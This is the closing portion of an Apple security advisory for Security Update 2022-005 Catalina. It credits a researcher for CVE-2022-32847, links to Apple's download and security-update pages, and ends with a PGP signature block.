CVE-2022-32847: Wang Yu of Cyberserval

Security Update 2022-005 Catalina may be obtained from the Mac App  
Store or Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuQACgkQeC9qKD1p  
rhiuNw//V3lvbuk3ZcN4l2+dumbidEYnYD+qrrm+V332BNA9zqn9Uyoy1l9mXY32  
qA/UfHpnuZj5F2qjBNinkpV9VlwMZUIZmWfLBrVz3+cF1wrF6RZVFmz05sVsWTCC  
zB7H9eCPQr/afrTgjf2evIsaCZaqveOP7ZVFV3dOEOpzp/hMUYFWF69mEbYfl2Z1  
PlB3bkZPys4fZ3nCq70egWotGl7V4M/9aqGBDQZzAwmcsepeppBaCP1MnDiDiWqA  
6m2jVNDDTP/CasfPt1k3jR3aKf7f+ySZozQLyUyMhRpTLnZ1fpEtD5jjwK/hprKW  
g00gdTOBl7aGAxbKL3xlsxXRGzhzy9n2RVN4duhRKEbDKDShCfRFmCxXGxAGJB7J  
96TqA/wy1s7gnlxNzUfJewJMopr3AU4ffhdyOgKV1Is7eRwAhKYlh3K5T6C28Uuj  
8TXAqY2qwMqs+jIqe3dGEuPBj83tQMD0xukIhzGtuxwoziiPyzSfrgUHvSK8vBYN  
NGGfLdHn8ailAYpnFeRxhImxclr59QddI8uzS/G6O9CLJY0jUh3tjCNC3fjIjS6F  
lD3+P/J/Hf5HFvpvNyw6aJVVYIcGFOQi+RmhVGysMHuGIz4aqc9rTdvbAKdeKpyK  
8p0C6S1/sV+pu7morGBm9aSm/rRyDZSVWSA2l/3fRA9mJmrL8Ao=  
=fcrb  
-----END PGP SIGNATURE-----

Tag

#apple